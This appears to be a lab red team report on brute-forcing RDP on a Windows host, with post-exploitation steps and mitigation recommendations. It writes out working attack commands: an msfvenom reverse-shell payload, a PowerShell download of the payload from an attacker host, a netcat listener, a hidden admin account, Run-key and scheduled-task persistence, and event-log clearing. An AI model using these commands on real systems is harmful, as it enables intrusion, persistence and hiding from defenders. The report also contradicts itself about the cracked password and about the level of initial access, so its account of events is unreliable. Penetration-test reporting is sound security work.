 This reporting file documents key aspects of the red team operation, ensuring that your findings and actions are well-organized for further analysis and mitigation.



Red Teaming RDP Pentest Report

1. Executive Summary

This document outlines the red team operation performed on the target Windows machine. The goal was to simulate a real-world attacker’s steps, including:

Brute-forcing weak Remote Desktop Protocol (RDP) credentials

Conducting post-exploitation activities

Setting up persistence mechanisms

Documenting findings and making mitigation recommendations


The operation was conducted in a safe and isolated lab environment, following ethical hacking practices.

2. Entry Vector

Entry Point: The target machine was accessible via the open RDP port (3389), which was identified through a network scan.

Tools Used: Nmap for scanning, Hydra and a custom Python script for brute-forcing RDP credentials.

Initial Access: RDP brute-forcing was performed against the Administrator account using a wordlist of common passwords.

Credentials Cracked: The successful credentials were Administrator:123456.


3. Credentials Cracked

Username: Administrator

Password: 1234

Method: Brute-forcing was performed using Hydra and Python scripting. The Python script automated RDP login attempts with the wordlist until successful credentials were found.


4. Privilege Escalation Method

Initial Privileges: The attacker initially had access to the system as a low-privilege user via RDP.

Method:

Local privilege escalation was attempted by checking user group memberships with whoami /groups.

The attacker used WinPEAS (Windows Privilege Escalation Script) to check for common vulnerabilities such as AlwaysInstallElevated and Unquoted service paths.

The attacker exploited a weak service permission found, elevating privileges to Administrator.



5. Persistence Mechanisms

Persistence was established on the target machine to ensure continued access after system reboots or logoffs:

Hidden Admin User: A new admin user (sysadmin) was added using the command:

net user sysadmin P@ssw0rd123 /add
net localgroup administrators sysadmin /add

Registry Persistence: A registry key was created to execute a backdoor payload upon user login:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\\rev.exe"

Scheduled Task: A scheduled task was created to execute the backdoor payload on user login:

schtasks /create /tn "Updater" /tr "C:\\rev.exe" /sc onlogon


6. Backdoor Shell

A reverse shell was established to enable remote command execution:

Payload Generated: A reverse TCP shell payload was created using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<kali_ip> LPORT=4444 -f exe -o rev.exe

Web Server: A Python HTTP server was started on Kali to serve the reverse shell payload:

python3 -m http.server 80

Payload Downloaded: The reverse shell payload was downloaded to the target machine using PowerShell:

powershell -c "Invoke-WebRequest -Uri http://<kali_ip>/rev.exe -OutFile C:\\rev.exe"

Execution: The reverse shell payload was executed on the target machine, and a listener was set up on Kali to catch the reverse connection:

nc -lvnp 4444


7. Lateral Movement

Network Scanning: After establishing a backdoor shell, the attacker attempted lateral movement across the network using:

net view /domain
net view \\<hostname>

Reuse of Cracked Credentials: The attacker attempted to reuse the cracked credentials on other machines within the network to gain further access. This could have been automated by using PsExec or other tools.


8. Clean-Up

Log Clearing: The attacker cleared event logs to avoid detection by deleting security and system logs:

wevtutil cl Security
wevtutil cl System

Backdoor and Payload Removal: The attacker removed the reverse shell payload and any new user accounts created to avoid detection.


9. Detection Logs

Event Logs:

Multiple failed login attempts were logged in the Security Event Logs.

The successful login using brute-forced credentials was logged.

The creation of a new user (sysadmin) and registry modification for persistence were logged in Windows Event Viewer.


Intrusion Detection: The creation of scheduled tasks and registry modifications could trigger alerts in advanced endpoint protection or SIEM systems.


10. Mitigation Recommendations

Strong Password Enforcement: Enforce strong password policies and implement multi-factor authentication (MFA) for all RDP access.

RDP Configuration: Disable RDP entirely if not needed, or restrict RDP access to trusted IP addresses only.

Account Lockout Policy: Implement account lockout mechanisms to limit brute-force attempts.

Monitoring & Alerts: Set up alerting for unusual activity such as multiple failed login attempts, new user creation, or scheduled task creation.

Endpoint Detection & Response (EDR): Use EDR solutions to detect abnormal behavior such as reverse shell connections or privilege escalation activities.

Event Log Monitoring: Ensure that all event logs are regularly reviewed for suspicious activity, including changes to user accounts and system configuration.


11. Tools & Scripts Used

Nmap: Port scanning to detect open RDP ports.

Hydra: Brute-forcing weak RDP credentials.

Python: Custom brute-forcing script using xfreerdp.

WinPEAS: Privilege escalation enumeration.

msfvenom: Reverse shell payload creation.

Netcat: Listener for the reverse shell.

PowerShell: Script for downloading the backdoor payload.

Wevtutil: Log clearing tool.


12. Conclusion

This report outlines the steps taken to perform an RDP brute-force attack, gain access, escalate privileges, set persistence, and execute post-exploitation activities. The report also highlights the tools used, the vulnerabilities found, and the mitigation strategies that can be implemented to prevent such attacks.




